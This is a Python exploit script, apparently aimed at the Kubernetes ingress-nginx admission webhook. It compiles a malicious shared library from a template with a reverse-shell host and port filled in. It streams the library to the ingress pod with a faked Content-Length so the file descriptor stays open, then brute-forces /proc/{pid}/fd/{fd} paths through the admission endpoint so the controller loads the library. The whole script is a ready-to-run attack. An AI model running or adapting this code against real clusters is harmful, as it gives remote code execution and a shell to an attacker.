import requests
import sys
from urllib.parse import urlparse
import threading
from concurrent.futures import ThreadPoolExecutor
import urllib3
import socket
import os 

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def create_lib(host, port):
    
    lib_code = open("lib_template.c", "r").read()
    lib_code = lib_code.replace("HOST", host)
    lib_code = lib_code.replace("PORT", str(port))
    
    with open("evil_engine.c", "w") as f:
        f.write(lib_code)
        f.close()
    
    process = os.system("gcc -fPIC -Wall -shared -o evil_engine.so evil_engine.c -lcrypto")
    if process == 0:
        print("[+] Shared object compiled successfully")
        return True
    else:
        print("[+] Error compiling shared object - gcc is installed?")
        sys.exit(0)
    
def send_request(admission_url, json_data, proc, fd):
    print(f"Trying Proc: {proc}, FD: {fd}")
    path = f"proc/{proc}/fd/{fd}"
    replaced_data = json_data.replace("REPLACE", path)

    headers = {
        "Content-Type": "application/json"
    }

    full_url = admission_url.rstrip("/") + "/admission"

    try:
        response = requests.post(full_url, data=replaced_data, headers=headers, verify=False, timeout=5)
        #print(response.text) - use this to debug (check response of admission webhook)
        print(f"Response for /proc/{proc}/fd/{fd}: {response.status_code}")
    except Exception as e:
        print(f"Error on /proc/{proc}/fd/{fd}: {e}")

def admission_brute(admission_url, max_workers=3):
    # before use review.json file, check if alico-system/node-certs exists on the cluster.
    with open("review.json", "r") as f:
        json_data = f.read()

    #proc = input("INPUT PROC:") - use this for manual testing
    #fd = input("INPUT FD:") - use this for manual testing 
    #send_request(admission_url, json_data, proc, fd) - use this for manual testing
    
    with ThreadPoolExecutor(max_workers=max_workers) as executor:
        for proc in range(1, 50): # can be increased to 100
            for fd in range(3, 30): # can be increased to 100 (not recommended)
                executor.submit(send_request, admission_url, json_data, proc, fd)

def exploit(ingress_url):

    with open("evil_engine.so", "rb") as f:
        evil_engine = f.read()

    real_length = len(evil_engine)
    fake_length = real_length + 10
    url = ingress_url  

    parsed = urlparse(url)
    host = parsed.hostname
    port = parsed.port or 80
    path = parsed.path or "/"

    try:
        sock = socket.create_connection((host, port))
    except Exception as e:
        print(f"Error connecting to {host}:{port}: {e} - host is up?")
        sys.exit(0)
    headers = (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"User-Agent: qmx-ingress-exploiter\r\n"
        f"Content-Type: application/octet-stream\r\n"
        f"Content-Length: {fake_length}\r\n"
        f"Connection: keep-alive\r\n"
        f"\r\n"
    ).encode("iso-8859-1")

    http_payload = headers + evil_engine
    sock.sendall(http_payload)

    response = b""
    while True:
        chunk = sock.recv(4096)
        if not chunk:
            break
        response += chunk

    print("[*] Resposta:")
    print(response.decode(errors="ignore"))

    sock.close()
            
if len(sys.argv) < 4:
    print("Usage: python3 exploit.py <ingress_url> <admission_webhook_url> <rev_host:port>")
    sys.exit(0)
else:
    ingress_url = sys.argv[1]
    admission = sys.argv[2]
    
    if ":" not in sys.argv[3]:
        print("Invalid rev_host:port")
        sys.exit(0)
    host = sys.argv[3].split(":")[0]
    port = sys.argv[3].split(":")[1]
    result = create_lib(host, port)
    if result:
        # Send the library to the ingress pod and keep the connection open to keep the file open via the file descriptor (FD).
        x = threading.Thread(target=exploit, args=(ingress_url,)) 
        x.start()
        admission_brute(admission) # start the admission webhook brute force (/proc/{pid}/fd/{fd})